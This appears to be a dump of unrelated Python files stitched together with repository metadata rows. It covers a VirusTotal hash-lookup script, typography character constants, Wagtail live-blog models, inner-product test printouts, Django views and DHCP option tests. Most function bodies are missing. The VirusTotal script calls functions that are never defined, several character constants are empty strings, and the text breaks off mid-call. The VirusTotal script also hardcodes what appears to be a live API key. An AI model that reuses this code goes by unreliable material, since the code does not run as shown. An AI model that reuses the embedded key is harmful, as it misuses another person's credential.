print("Instructions are on https://github.com/b0kch01/ColorfulValorant")
print("\nEnjoy! :)")
keyboard.wait("up + down")
except KeyboardInterrupt:
exit(0) | 20.708333 | 89 | 0.607646 |
115bab6acf9f1efb52620d943da91627a011d588 | 2,240 | py | Python | virus_total.py | jonschipp/nsm-tools | bc465038bfeb215ca54b67bb4170d607327d0436 | [
"BSD-2-Clause"
] | 3 | 2016-02-26T06:28:47.000Z | 2016-12-09T23:19:35.000Z | virus_total.py | jonschipp/nsm-tools | bc465038bfeb215ca54b67bb4170d607327d0436 | [
"BSD-2-Clause"
] | null | null | null | virus_total.py | jonschipp/nsm-tools | bc465038bfeb215ca54b67bb4170d607327d0436 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
import json
import urllib
import urllib2
import sys
apikey = '843fa2012b619be746ead785b933d59820a2e357c7c186e581e8fcadbe2e550e'
mhash = arguments()
data = query_api(mhash, apikey)
if not in_database(data, mhash):
print 'No entry for %s in database' % mhash
exit(1)
# Positive match found
sha1, filenames, first_seen, last_seen, last_scan_permalink, last_scan_report = collect(data)
if is_malware(last_scan_report):
msg(sha1, filenames, first_seen, last_seen, last_scan_permalink)
exit(0)
else:
print 'Entry %s is not malicious' % mhash
exit(1)
| 27.317073 | 93 | 0.69375 |
115e6da0adc887e907135e22cea5b992136e5b12 | 791 | py | Python | typus/chars.py | byashimov/typus | b0576d6065163cc46a171b90027f2e3321ae7615 | [
"BSD-3-Clause"
] | 65 | 2016-06-15T08:44:58.000Z | 2021-02-02T10:42:23.000Z | typus/chars.py | byashimov/typus | b0576d6065163cc46a171b90027f2e3321ae7615 | [
"BSD-3-Clause"
] | 4 | 2018-11-15T17:10:05.000Z | 2020-01-09T19:44:39.000Z | typus/chars.py | byashimov/typus | b0576d6065163cc46a171b90027f2e3321ae7615 | [
"BSD-3-Clause"
] | 6 | 2017-10-20T16:28:45.000Z | 2021-11-11T18:41:21.000Z | __all__ = (
'ANYSP',
'DLQUO',
'DPRIME',
'LAQUO',
'LDQUO',
'LSQUO',
'MDASH',
'MDASH_PAIR',
'MINUS',
'NBSP',
'NDASH',
'NNBSP',
'RAQUO',
'RDQUO',
'RSQUO',
'SPRIME',
'THNSP',
'TIMES',
'WHSP',
)
NBSP = '\u00A0'
NNBSP = '\u202F'
THNSP = '\u2009'
WHSP = ' '
ANYSP = r'[{}{}{}{}]'.format(WHSP, NBSP, NNBSP, THNSP)
NDASH = ''
MDASH = ''
MDASH_PAIR = NNBSP + MDASH + THNSP
HYPHEN = ''
MINUS = ''
TIMES = ''
LSQUO = '' # left curly quote mark
RSQUO = '' # right curly quote mark/apostrophe
LDQUO = '' # left curly quote marks
RDQUO = '' # right curly quote marks
DLQUO = '' # double low curly quote mark
LAQUO = '' # left angle quote marks
RAQUO = '' # right angle quote marks
SPRIME = ''
DPRIME = ''
| 16.829787 | 54 | 0.525917 |
1160107f399496c19ae30848738f2468e25e6508 | 5,259 | py | Python | src/wagtail_live/models.py | Stormheg/wagtail-live | a5eb79024d44c060079ae7d4707d6220ea66ff5b | [
"BSD-3-Clause"
] | null | null | null | src/wagtail_live/models.py | Stormheg/wagtail-live | a5eb79024d44c060079ae7d4707d6220ea66ff5b | [
"BSD-3-Clause"
] | null | null | null | src/wagtail_live/models.py | Stormheg/wagtail-live | a5eb79024d44c060079ae7d4707d6220ea66ff5b | [
"BSD-3-Clause"
] | null | null | null | """ Wagtail Live models."""
from django.db import models
from django.utils.timezone import now
from wagtail.admin.edit_handlers import FieldPanel, StreamFieldPanel
from wagtail.core.fields import StreamField
from .blocks import LivePostBlock
| 28.895604 | 85 | 0.601065 |
1161293fb1e28e5788a7aa124f039306bb2b8a3e | 2,291 | py | Python | python/test_inprod_analytic.py | solepomies/MAOOAM | 3a30c4030da384a9c4a8510a628c5c1f8ff511cc | [
"MIT"
] | 18 | 2016-04-21T08:45:15.000Z | 2021-11-30T11:21:40.000Z | python/test_inprod_analytic.py | solepomies/MAOOAM | 3a30c4030da384a9c4a8510a628c5c1f8ff511cc | [
"MIT"
] | 1 | 2019-07-15T13:01:21.000Z | 2019-07-15T13:01:21.000Z | python/test_inprod_analytic.py | solepomies/MAOOAM | 3a30c4030da384a9c4a8510a628c5c1f8ff511cc | [
"MIT"
] | 15 | 2016-05-12T12:09:51.000Z | 2021-12-17T18:43:07.000Z | import numpy as np
from inprod_analytic import *
from params_maooam import natm, noc
init_inprod()
real_eps = 2.2204460492503131e-16
"""This module print the coefficients computed in the inprod_analytic module"""
for i in range(0, natm):
for j in range(0, natm):
if(abs(atmos.a[i, j]) >= real_eps):
print ("a["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.a[i, j])
if(abs(atmos.c[i, j]) >= real_eps):
print ("c["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.c[i, j])
for k in range(0, natm):
if(abs(atmos.b[i, j, k]) >= real_eps):
print (
"b["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] =%.5E"
% atmos.b[i, j, k])
if(abs(atmos.g[i, j, k]) >= real_eps):
print (
"g["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] = % .5E"
% atmos.g[i, j, k])
for i in range(0, natm):
for j in range(0, noc):
if(abs(atmos.d[i, j]) >= real_eps):
print ("d["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.d[i, j])
if(abs(atmos.s[i, j]) >= real_eps):
print ("s["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.s[i, j])
for i in range(0, noc):
for j in range(0, noc):
if(abs(ocean.M[i, j]) >= real_eps):
print ("M["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % ocean.M[i, j])
if(abs(ocean.N[i, j]) >= real_eps):
print ("N["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % ocean.N[i, j])
for k in range(0, noc):
if(abs(ocean.O[i, j, k]) >= real_eps):
print (
"O["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] = % .5E"
% ocean.O[i, j, k])
if(abs(ocean.C[i, j, k]) >= real_eps):
print (
"C["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] = % .5E"
% ocean.C[i, j, k])
for j in range(0, natm):
if(abs(ocean.K[i, j]) >= real_eps):
print (
"K["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E"
% ocean.K[i, j])
if(abs(ocean.W[i, j]) >= real_eps):
print (
"W["+str(i+1)+"]" + "["+str(j+1)+"] = % .5E"
% ocean.W[i, j])
| 38.830508 | 79 | 0.395024 |
11618053ba49ca083edd95cb07327f86424a2f0d | 849 | py | Python | public/views/fallback.py | jgarber623/openstates.org | 0c514c955f7ffbe079c77c3ec00345b20818ad04 | [
"MIT"
] | null | null | null | public/views/fallback.py | jgarber623/openstates.org | 0c514c955f7ffbe079c77c3ec00345b20818ad04 | [
"MIT"
] | null | null | null | public/views/fallback.py | jgarber623/openstates.org | 0c514c955f7ffbe079c77c3ec00345b20818ad04 | [
"MIT"
] | null | null | null | from django.http import Http404, HttpResponse
from django.shortcuts import redirect
import boto3
from botocore.errorfactory import ClientError
from ..models import PersonProxy
| 28.3 | 56 | 0.693757 |
116356ed291907faf2d830bb75f61d5e69fb9f8d | 12,534 | py | Python | tests/test_OptionList.py | CrsiX/dhcppython | c442c3f6eca8244667df8a19d370f7569d81f08f | [
"Apache-2.0"
] | 2 | 2021-09-13T13:35:46.000Z | 2021-11-15T15:33:24.000Z | tests/test_OptionList.py | CrsiX/dhcppython | c442c3f6eca8244667df8a19d370f7569d81f08f | [
"Apache-2.0"
] | 2 | 2021-11-12T08:25:02.000Z | 2021-12-04T02:28:38.000Z | tests/test_OptionList.py | CrsiX/dhcppython | c442c3f6eca8244667df8a19d370f7569d81f08f | [
"Apache-2.0"
] | 3 | 2021-09-08T08:48:30.000Z | 2022-01-21T03:14:11.000Z | import unittest
from dhcppython import options
if __name__ == "__main__":
unittest.main()
| 40.827362 | 245 | 0.564704 |
11649ccd701bc4417bcc78c7dc346d299411f6ad | 102 | py | Python | keras/legacy_tf_layers/__init__.py | tsheaff/keras | ee227dda766d769b7499a5549e8ed77b5e88105b | [
"Apache-2.0"
] | 37,222 | 2017-12-13T00:52:55.000Z | 2022-03-31T22:34:35.000Z | keras/legacy_tf_layers/__init__.py | amirsadafi/keras | f1e9c76675981ee6683f54a3ce569212d551d12d | [
"Apache-2.0"
] | 7,624 | 2017-12-13T01:03:40.000Z | 2022-03-31T23:57:24.000Z | keras/legacy_tf_layers/__init__.py | amirsadafi/keras | f1e9c76675981ee6683f54a3ce569212d551d12d | [
"Apache-2.0"
] | 14,914 | 2017-12-13T02:30:46.000Z | 2022-03-30T14:49:16.000Z | """Init file."""
from keras.legacy_tf_layers import migration_utils # pylint: disable=unused-import
| 25.5 | 83 | 0.77451 |
1164dd3dd45d08ace50ca4b24008ab7f5c008eee | 1,485 | py | Python | 1stRound/Medium/449-Serialize and Deserialize BST/DFSPreOrder.py | ericchen12377/Leetcode-Algorithm-Python | eb58cd4f01d9b8006b7d1a725fc48910aad7f192 | [
"MIT"
] | 2 | 2020-04-24T18:36:52.000Z | 2020-04-25T00:15:57.000Z | 1stRound/Medium/449-Serialize and Deserialize BST/DFSPreOrder.py | ericchen12377/Leetcode-Algorithm-Python | eb58cd4f01d9b8006b7d1a725fc48910aad7f192 | [
"MIT"
] | null | null | null | 1stRound/Medium/449-Serialize and Deserialize BST/DFSPreOrder.py | ericchen12377/Leetcode-Algorithm-Python | eb58cd4f01d9b8006b7d1a725fc48910aad7f192 | [
"MIT"
] | null | null | null | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
# Your Codec object will be instantiated and called as such:
# Your Codec object will be instantiated and called as such:
# ser = Codec()
# deser = Codec()
# tree = ser.serialize(root)
# ans = deser.deserialize(tree)
# return ans | 29.7 | 97 | 0.534007 |
116638e98b91db5181f4b52e40fed58dce87a1e3 | 1,038 | py | Python | aws_tests/aws_mlops_scripts/sagemaker_trigger.py | Chronicles-of-AI/archives | 23b978a709c785ff00ec90487039944b8ab8f4fb | [
"MIT"
] | null | null | null | aws_tests/aws_mlops_scripts/sagemaker_trigger.py | Chronicles-of-AI/archives | 23b978a709c785ff00ec90487039944b8ab8f4fb | [
"MIT"
] | null | null | null | aws_tests/aws_mlops_scripts/sagemaker_trigger.py | Chronicles-of-AI/archives | 23b978a709c785ff00ec90487039944b8ab8f4fb | [
"MIT"
] | null | null | null | import os
import sagemaker
from sagemaker import get_execution_role
from sagemaker.tensorflow.estimator import TensorFlow
sagemaker_session = sagemaker.Session()
# role = get_execution_role()
region = sagemaker_session.boto_session.region_name
training_input_path = "s3://intel-edge-poc/mask_dataset_datagen/train/"
validation_input_path = "s3://intel-edge-poc/mask_dataset_datagen/val/"
hyperparam = {
"save_model_dir": "s3://intel-edge-poc/saved/",
"batch_size": 32,
"epochs": 2,
"optimizer": "adam",
"learning_rate": 1e-3,
}
#'train_dir': 'mask_dataset_datagen/train/',
#'val_dir': 'mask_dataset_datagen/val/'
#'bucket' : 'intel-edge-poc',
tf_estimator = TensorFlow(
entry_point="TrainingJob.py",
role="intel-edge-poc-role",
instance_count=1,
instance_type="ml.c4.xlarge",
framework_version="2.3",
py_version="py37",
hyperparameters=hyperparam,
script_mode=True,
)
# tf_estimator.fit()
tf_estimator.fit({"training": training_input_path, "validation": validation_input_path})
| 25.95 | 88 | 0.735067 |
1166eafac1780fdb1b04815e3dcee64d69f82e8c | 314 | py | Python | imgbase/filters.py | olajir/projbase | c434bf5ef0627e7161fe026885a778e8240a26a0 | [
"MIT"
] | null | null | null | imgbase/filters.py | olajir/projbase | c434bf5ef0627e7161fe026885a778e8240a26a0 | [
"MIT"
] | null | null | null | imgbase/filters.py | olajir/projbase | c434bf5ef0627e7161fe026885a778e8240a26a0 | [
"MIT"
] | null | null | null |
import numpy as np
import skimage
import skimage.morphology as morph
import skimage.filters as filt
import skimage.exposure as expo
def get_corrected_image(iimage, gamma=0.25):
"""Return filtered image to detect spots."""
image = skimage.util.img_as_float(iimage)
image **= gamma
return image
| 19.625 | 48 | 0.745223 |
11677e2c59bc64a37229b6462c616546dac9135c | 398 | py | Python | packages/python/yap_kernel/yap_ipython/utils/tests/test_sysinfo.py | ryandesign/yap | 9a50d1a3d985ec559ebfbb8e9f4d4c6b88b30214 | [
"Artistic-1.0-Perl",
"ClArtistic"
] | 90 | 2015-03-09T01:24:15.000Z | 2022-02-24T13:56:25.000Z | packages/python/yap_kernel/yap_ipython/utils/tests/test_sysinfo.py | ryandesign/yap | 9a50d1a3d985ec559ebfbb8e9f4d4c6b88b30214 | [
"Artistic-1.0-Perl",
"ClArtistic"
] | 52 | 2016-02-14T08:59:37.000Z | 2022-03-14T16:39:35.000Z | packages/python/yap_kernel/yap_ipython/utils/tests/test_sysinfo.py | ryandesign/yap | 9a50d1a3d985ec559ebfbb8e9f4d4c6b88b30214 | [
"Artistic-1.0-Perl",
"ClArtistic"
] | 27 | 2015-11-19T02:45:49.000Z | 2021-11-25T19:47:58.000Z | # coding: utf-8
"""Test suite for our sysinfo utilities."""
# Copyright (c) yap_ipython Development Team.
# Distributed under the terms of the Modified BSD License.
import json
import nose.tools as nt
from yap_ipython.utils import sysinfo
def test_json_getsysinfo():
"""
test that it is easily jsonable and don't return bytes somewhere.
"""
json.dumps(sysinfo.get_sys_info())
| 22.111111 | 70 | 0.728643 |
116964ae9fc7694d62c644302058f5dab73652eb | 268 | py | Python | TestHospital/test/test_login_negative/test_login_invalid_credentials.py | Irshak10/AQA | b5e22e6fdc017040e2fefcf148792ba74fd38b8d | [
"MIT"
] | null | null | null | TestHospital/test/test_login_negative/test_login_invalid_credentials.py | Irshak10/AQA | b5e22e6fdc017040e2fefcf148792ba74fd38b8d | [
"MIT"
] | null | null | null | TestHospital/test/test_login_negative/test_login_invalid_credentials.py | Irshak10/AQA | b5e22e6fdc017040e2fefcf148792ba74fd38b8d | [
"MIT"
] | null | null | null | from Pages.LoginPage import LoginPage
| 19.142857 | 41 | 0.742537 |
116ab6cd1db9f2f070145181b5804b80b331c8fe | 2,040 | py | Python | script2.py | joshigarvitgh/image-processing | 70e3ca093882904d5d995153ca079d000996a240 | [
"Apache-2.0"
] | null | null | null | script2.py | joshigarvitgh/image-processing | 70e3ca093882904d5d995153ca079d000996a240 | [
"Apache-2.0"
] | null | null | null | script2.py | joshigarvitgh/image-processing | 70e3ca093882904d5d995153ca079d000996a240 | [
"Apache-2.0"
] | null | null | null | from pyimagesearch.shapedetector import ShapeDetector
from pyimagesearch.colorlabeler import ColorLabeler
import argparse
import imutils
import numpy as np
import cv2
import argparse
import imutils
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
if face_cascade.empty(): raise Exception("your face_cascade is empty. are you sure, the path is correct ?")
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
if eye_cascade.empty(): raise Exception("your eye_cascade is empty. are you sure, the path is correct ?")
video = cv2.VideoCapture(0)
while(video.isOpened()):
ret, frame = video.read()
if frame is not None:
resized = imutils.resize(frame,width=600)
ratio=frame.shape[0] / float(resized.shape[0])
blurred = cv2.GaussianBlur(resized, (5, 5), 0)
gray = cv2.cvtColor(blurred, cv2.COLOR_BGR2GRAY)
lab = cv2.cvtColor(blurred, cv2.COLOR_BGR2LAB)
thresh = cv2.threshold(gray, 60, 255, cv2.THRESH_BINARY)[1]
# find contours in the thresholded image and initialize the
# shape detector
cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if imutils.is_cv2() else cnts[1]
sd = ShapeDetector()
cl = ColorLabeler()
# loop over the contours
for c in cnts:
# compute the center of the contour, then detect the name of the
# shape using only the contour
M = cv2.moments(c)
#cX = int((M["m10"] / M["m00"]) * ratio)
#cY = int((M["m01"] / M["m00"]) * ratio)
shape = sd.detect(c)
color = cl.label(lab, c)
print(shape)
print(color)
# multiply the contour (x, y)-coordinates by the resize ratio,
# then draw the contours and the name of the shape on the image
c = c.astype("float")
c *= ratio
c = c.astype("int")
cv2.drawContours(frame, [c], -1, (0, 255, 0), 2)
#cv2.putText(frame, shape, (cX, cY), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)
cv2.imshow('Video',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video.release()
cv2.destroyAllWindows()
| 35.789474 | 107 | 0.698039 |
116af1be02eed7748796fab7b787f2cb8771a926 | 548 | py | Python | 044/main.py | autozimu/projecteuler | 12a8244b7ef9358ac6ca30698cd761c81c3ec925 | [
"MIT"
] | null | null | null | 044/main.py | autozimu/projecteuler | 12a8244b7ef9358ac6ca30698cd761c81c3ec925 | [
"MIT"
] | null | null | null | 044/main.py | autozimu/projecteuler | 12a8244b7ef9358ac6ca30698cd761c81c3ec925 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
s = [n * (3 * n - 1) / 2 for n in range(0, 10000)]
found = False
i = 1900
while not found:
i += 1
j = 1
while j < i:
# actually, we cannot guarentee that j < i, the real condition would
# be s[i] < 3 * j + 1, which is the distance of s[j] and s[j + 1]. But
# this one is too time consuming.
print i, j
if (s[i] + s[j]) in s and (2 * s[j] + s[i]) in s:
print 'found', i, j
found = True
break
else:
j += 1
print s[i]
| 23.826087 | 78 | 0.470803 |
116b03d71f4f5e5f3ca2c20583aee06f48a45793 | 911 | py | Python | apt/anonymization/__init__.py | IBM/ai-privacy-toolkit | a9a93c8a3a026b8a4b01266e11698166b7cdbb44 | [
"MIT"
] | 34 | 2021-04-28T15:12:36.000Z | 2022-03-28T11:38:48.000Z | apt/anonymization/__init__.py | IBM/ai-privacy-toolkit | a9a93c8a3a026b8a4b01266e11698166b7cdbb44 | [
"MIT"
] | 13 | 2021-07-14T11:02:35.000Z | 2022-02-23T17:57:51.000Z | apt/anonymization/__init__.py | IBM/ai-privacy-toolkit | a9a93c8a3a026b8a4b01266e11698166b7cdbb44 | [
"MIT"
] | 9 | 2021-05-18T21:26:07.000Z | 2022-03-06T14:58:57.000Z | """
Module providing ML anonymization.
This module contains methods for anonymizing ML model training data, so that when
a model is retrained on the anonymized data, the model itself will also be considered
anonymous. This may help exempt the model from different obligations and restrictions
set out in data protection regulations such as GDPR, CCPA, etc.
The module contains methods that enable anonymizing training datasets in a manner that
is tailored to and guided by an existing, trained ML model. It uses the existing model's
predictions on the training data to train a second, anonymizer model, that eventually determines
the generalizations that will be applied to the training data. For more information about the
method see: https://arxiv.org/abs/2007.13086
Once the anonymized training data is returned, it can be used to retrain the model.
"""
from apt.anonymization.anonymizer import Anonymize
| 50.611111 | 96 | 0.812294 |
116b7b4ac4b9d4a7f8c63237f875c149f4bb08e0 | 2,016 | py | Python | qiskit_code/DeutschJozsa.py | OccumRazor/implement-quantum-algotirhms-with-qiskit | 8574b6505fc34f12eb63e1791e969099d56e3974 | [
"MIT"
] | 3 | 2020-11-03T01:21:48.000Z | 2021-09-23T18:53:40.000Z | qiskit_code/DeutschJozsa.py | OccumRazor/implement-quantum-algotirhms-with-qiskit | 8574b6505fc34f12eb63e1791e969099d56e3974 | [
"MIT"
] | null | null | null | qiskit_code/DeutschJozsa.py | OccumRazor/implement-quantum-algotirhms-with-qiskit | 8574b6505fc34f12eb63e1791e969099d56e3974 | [
"MIT"
] | null | null | null | from qiskit import QuantumRegister,QuantumCircuit
from qiskit.aqua.operators import StateFn
from qiskit.aqua.operators import I
from qiskit_code.quantumMethod import add,ini
from qiskit_code.classicalMethod import Dec2Bi
#DeutschJozsa('constant')
#DeutschJozsa('balanced')
| 38.037736 | 92 | 0.671131 |
116bf2691d7781b16c90385ce38a0af9b3dfe37f | 480 | py | Python | web/products-manager/solve.py | cclauss/fbctf-2019-challenges | 4353c2ce588cf097ac6ca9bcf7b943a99742ac75 | [
"MIT"
] | 213 | 2019-06-14T18:28:40.000Z | 2021-12-27T14:44:45.000Z | web/products-manager/solve.py | cclauss/fbctf-2019-challenges | 4353c2ce588cf097ac6ca9bcf7b943a99742ac75 | [
"MIT"
] | 2 | 2020-06-05T21:14:51.000Z | 2021-06-10T21:34:03.000Z | web/products-manager/solve.py | cclauss/fbctf-2019-challenges | 4353c2ce588cf097ac6ca9bcf7b943a99742ac75 | [
"MIT"
] | 59 | 2019-06-17T17:35:29.000Z | 2021-12-04T22:26:37.000Z | import requests
import random, string
x = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(16))
URL = "http://localhost/"
secret = "aA11111111" + x
# Registering a user
requests.post(url = "%s/add.php" % URL, data = {
'name': 'facebook' + ' '*64 + 'abc',
'secret': secret,
'description': 'desc',
})
r = requests.post(url = "%s/view.php" % URL, data = {
'name': 'facebook',
'secret': secret,
})
print(r.text)
| 21.818182 | 110 | 0.63125 |
feba32dda1863dbf22b57f349bb7f5c4d2450b8d | 737 | py | Python | app/__main__.py | sabuj073/Pyqt | fd316ca81b57cf45c4b02661ae32d3e87da86643 | [
"MIT"
] | 15 | 2019-07-17T04:35:43.000Z | 2022-03-06T10:56:57.000Z | app/__main__.py | SadeghShabestani/pyqt-gui-template | 7b0be93b28519fecef061ae6fd257b5e1414f609 | [
"MIT"
] | null | null | null | app/__main__.py | SadeghShabestani/pyqt-gui-template | 7b0be93b28519fecef061ae6fd257b5e1414f609 | [
"MIT"
] | 7 | 2019-11-02T05:03:01.000Z | 2022-01-22T07:16:35.000Z | import argparse
import sys
import traceback
from .app import Application
sys.excepthook = new_excepthook
if __name__ == '__main__':
main()
| 20.472222 | 75 | 0.663501 |
febafd98c2edf8a650a93925007e3f317d57cdc1 | 848 | py | Python | test/test_1030.py | ralphribeiro/uri-projecteuler | 7151d86e014aea9c56026cc88f50b4e940117dd8 | [
"MIT"
] | null | null | null | test/test_1030.py | ralphribeiro/uri-projecteuler | 7151d86e014aea9c56026cc88f50b4e940117dd8 | [
"MIT"
] | null | null | null | test/test_1030.py | ralphribeiro/uri-projecteuler | 7151d86e014aea9c56026cc88f50b4e940117dd8 | [
"MIT"
] | null | null | null | from unittest import TestCase
from exercicios.ex1030 import calcula_suicidio
import random
| 29.241379 | 66 | 0.59434 |
febbb570031584153cc453531cfad9d62d5b53da | 656 | py | Python | python/enthic/utils/__init__.py | phe-sto/enthic | 0ca3ea949f418ccf72978a92c814b05b82fa3076 | [
"WTFPL"
] | 10 | 2019-12-06T14:19:24.000Z | 2020-11-19T13:12:35.000Z | python/enthic/utils/__init__.py | phe-sto/enthic | 0ca3ea949f418ccf72978a92c814b05b82fa3076 | [
"WTFPL"
] | 25 | 2020-03-31T17:08:22.000Z | 2022-02-10T22:27:43.000Z | python/enthic/utils/__init__.py | phe-sto/enthic | 0ca3ea949f418ccf72978a92c814b05b82fa3076 | [
"WTFPL"
] | null | null | null | # -*- coding: utf-8 -*-
from json import load
from logging import basicConfig
from os.path import join, dirname
from pathlib import Path
################################################################################
# CHECKING THE INPUT AND OUTPUT AND DIRECTORY PATH
# INPUT
with open(join(Path(dirname(__file__)).parent.absolute(), "configuration.json")) as json_configuration_file:
CONFIG = load(json_configuration_file)
################################################################################
# SET LOG LEVEL
basicConfig(level=CONFIG['debugLevel'],
format="%(asctime)s [%(levelname)8s] %(message)s (%(filename)s:%(lineno)s)")
| 41 | 108 | 0.551829 |
febd1a039c30d408c01acbf196e318f0a33735b0 | 2,177 | py | Python | src/messageHandler.py | lorandcheng/ee250-final-project | e99da9b0221b4f3fdf4737814b9fa4b9152e15d6 | [
"MIT"
] | null | null | null | src/messageHandler.py | lorandcheng/ee250-final-project | e99da9b0221b4f3fdf4737814b9fa4b9152e15d6 | [
"MIT"
] | null | null | null | src/messageHandler.py | lorandcheng/ee250-final-project | e99da9b0221b4f3fdf4737814b9fa4b9152e15d6 | [
"MIT"
] | null | null | null | # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Author: Lorand Cheng https://github.com/lorandcheng
# Date: Nov 15, 2020
# Project: USC EE250 Final Project, Morse Code Translator and Messenger
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import json
import requests
from datetime import datetime
from pprint import pprint
| 28.272727 | 97 | 0.519982 |
febd4c5ea5d37f5d661349afebfd22902257f283 | 1,637 | py | Python | app/management/commands/generate.py | abogoyavlensky/django-pg-research | bee5ac40a3e0d33e7a88ed48ec6dc04c87528db6 | [
"MIT"
] | null | null | null | app/management/commands/generate.py | abogoyavlensky/django-pg-research | bee5ac40a3e0d33e7a88ed48ec6dc04c87528db6 | [
"MIT"
] | null | null | null | app/management/commands/generate.py | abogoyavlensky/django-pg-research | bee5ac40a3e0d33e7a88ed48ec6dc04c87528db6 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import random
from random_words import RandomWords
from random_words import LoremIpsum
from django.core.management.base import BaseCommand
from app.models import Tag
from app.models import Post
| 30.314815 | 79 | 0.546121 |
febdebe28a0eb11da7fb60e489e4b8faec751e19 | 1,898 | py | Python | data_loader.py | isLinXu/AIToodlBox | bacdea77b35e370f728c9fd170ad15c0dd112a09 | [
"MIT"
] | 3 | 2021-09-15T02:24:45.000Z | 2021-09-16T03:27:58.000Z | data_loader.py | isLinXu/AIToodlBox | bacdea77b35e370f728c9fd170ad15c0dd112a09 | [
"MIT"
] | null | null | null | data_loader.py | isLinXu/AIToodlBox | bacdea77b35e370f728c9fd170ad15c0dd112a09 | [
"MIT"
] | null | null | null | import numpy as np
import os
| 26.361111 | 72 | 0.682824 |
febed84610cce92ca5a78eecfa305870b18cc6d4 | 6,764 | py | Python | ros/src/waypoint_updater/waypoint_updater.py | Abdilaziz/CarND-Capstone | 55b071c46b92658dc1617e3ff34531cd5282a8e1 | [
"MIT"
] | null | null | null | ros/src/waypoint_updater/waypoint_updater.py | Abdilaziz/CarND-Capstone | 55b071c46b92658dc1617e3ff34531cd5282a8e1 | [
"MIT"
] | null | null | null | ros/src/waypoint_updater/waypoint_updater.py | Abdilaziz/CarND-Capstone | 55b071c46b92658dc1617e3ff34531cd5282a8e1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Waypoint Updater.
This node will publish waypoints from the car's current position to some `x` distance ahead.
As mentioned in the doc, you should ideally first implement a version which does not care
about traffic lights or obstacles.
Once you have created dbw_node, you will update this node to use the status of traffic lights too.
Please note that our simulator also provides the exact location of traffic lights and their
current status in `/vehicle/traffic_lights` message. You can use this message to build this node
as well as to verify your TL classifier.
TODO:
- Stopline location for each traffic light.
"""
import rospy
from geometry_msgs.msg import PoseStamped, TwistStamped
from styx_msgs.msg import Lane, Waypoint
from std_msgs.msg import Int32
import tf
from scipy.spatial import KDTree
import numpy as np
import math
LOOKAHEAD_WPS = 100 # Number of waypoints we will publish. You can change this number
MAX_DECEL = 1. # max. allowed deceleration
### Deceleration profile functions:
# Proposal by Udacity-walkthrough for deceleration profile:
# Further scaling of profile will be necessary later (still untested, 30/03/2018)
# Further scaling of profile will be necessary later (still untested 30/03/2018)
if __name__ == '__main__':
try:
WaypointUpdater()
except rospy.ROSInterruptException:
rospy.logerr('Could not start waypoint updater node.')
| 35.046632 | 134 | 0.668096 |
febfb7afb944937a4daedbf45bdc05b9348c3b75 | 305 | py | Python | scripts/pdutil.py | travisdowns/sort-bench | 97e18e08a5c43dec337f01ac7e3c55e5acb37507 | [
"MIT"
] | 50 | 2019-05-23T23:17:19.000Z | 2022-02-19T05:17:00.000Z | scripts/pdutil.py | travisdowns/sort-bench | 97e18e08a5c43dec337f01ac7e3c55e5acb37507 | [
"MIT"
] | 1 | 2021-04-11T09:38:44.000Z | 2021-04-22T15:14:32.000Z | scripts/pdutil.py | travisdowns/sort-bench | 97e18e08a5c43dec337f01ac7e3c55e5acb37507 | [
"MIT"
] | 4 | 2019-05-23T23:08:05.000Z | 2021-10-02T21:49:24.000Z | # renames duplicate columns by suffixing _1, _2 etc
| 23.461538 | 51 | 0.481967 |
fec02f47aa5ff13585413d302b592d2cd4c27b9a | 6,111 | py | Python | sbc_ngs/pathway.py | UoMMIB/SequenceGenie | 65fce1df487afd2de32e9d3ebc487874e71436bc | [
"MIT"
] | 5 | 2019-11-01T19:38:09.000Z | 2021-03-29T16:13:56.000Z | sbc_ngs/pathway.py | UoMMIB/SequenceGenie | 65fce1df487afd2de32e9d3ebc487874e71436bc | [
"MIT"
] | null | null | null | sbc_ngs/pathway.py | UoMMIB/SequenceGenie | 65fce1df487afd2de32e9d3ebc487874e71436bc | [
"MIT"
] | 3 | 2021-05-05T20:01:24.000Z | 2022-03-11T15:20:51.000Z | '''
sbc-ngs (c) University of Manchester 2019
All rights reserved.
@author: neilswainston
'''
# pylint: disable=no-member
# pylint: disable=too-few-public-methods
# pylint: disable=too-many-arguments
# pylint: disable=too-many-instance-attributes
# pylint: disable=unused-argument
# pylint: disable=wrong-import-order
from __future__ import division
import os
import subprocess
import sys
import uuid
import multiprocessing as mp
import pandas as pd
from sbc_ngs import demultiplex, results, utils, vcf_utils
def _get_barcode_seq(barcode_seq_filename):
'''Get barcode seq dict.'''
barcode_seq = pd.read_csv(barcode_seq_filename,
dtype={'barcode': str, 'seq_id': str}) \
if barcode_seq_filename else None
return barcode_seq.set_index('barcode')['seq_id'].to_dict()
def _score_alignment(dir_name, barcodes, reads_filename, seq_files,
num_threads, write_queue):
'''Score an alignment.'''
for seq_id, seq_filename in seq_files.items():
barcode_dir_name = utils.get_dir(dir_name, barcodes, seq_id)
bam_filename = os.path.join(barcode_dir_name, '%s.bam' % barcodes[2])
vcf_filename = bam_filename.replace('.bam', '.vcf')
prc = subprocess.Popen(('bwa', 'mem',
'-x', 'ont2d',
'-O', '6',
'-t', str(num_threads),
